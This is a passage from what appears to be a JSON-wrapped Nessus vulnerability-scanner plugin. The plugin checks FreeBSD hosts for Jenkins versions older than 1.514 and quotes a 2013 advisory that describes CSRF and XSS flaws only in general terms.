attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jenkins Security Advisory reports :\n\nThis advisory announces multiple security vulnerabilities that were\nfound in Jenkins core.\n\n- SECURITY-63 / CVE-2013-2034\n\nThis creates a cross-site request forgery (CSRF) vulnerability on\nJenkins master, where an anonymous attacker can trick an administrator\nto execute arbitrary code on Jenkins master by having him open a\nspecifically crafted attack URL.\n\nThere's also a related vulnerability where the permission check on\nthis ability is done imprecisely, which may affect those who are\nrunning Jenkins instances with a custom authorization strategy plugin.\n\n- SECURITY-67 / CVE-2013-2033\n\nThis creates a cross-site scripting (XSS) vulnerability, where an\nattacker with a valid user account on Jenkins can execute 
JavaScript\nin the browser of other users, if those users are using certain\nbrowsers.\n\n- SECURITY-69 / CVE-2013-2034\n\nThis is another CSRF vulnerability that allows an attacker to cause a\ndeployment of binaries to Maven repositories. This vulnerability has\nthe same CVE ID as SEUCRITY-63.\n\n- SECURITY-71 / CVE-2013-1808\n\nThis creates a cross-site scripting (XSS) vulnerability.\"\n );\n # https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2013-05-02\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?832b8cbc\"\n );\n # https://vuxml.freebsd.org/freebsd/622e14b1-b40c-11e2-8441-00e0814cab4e.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?65f6b23a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"jenkins<1.514\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}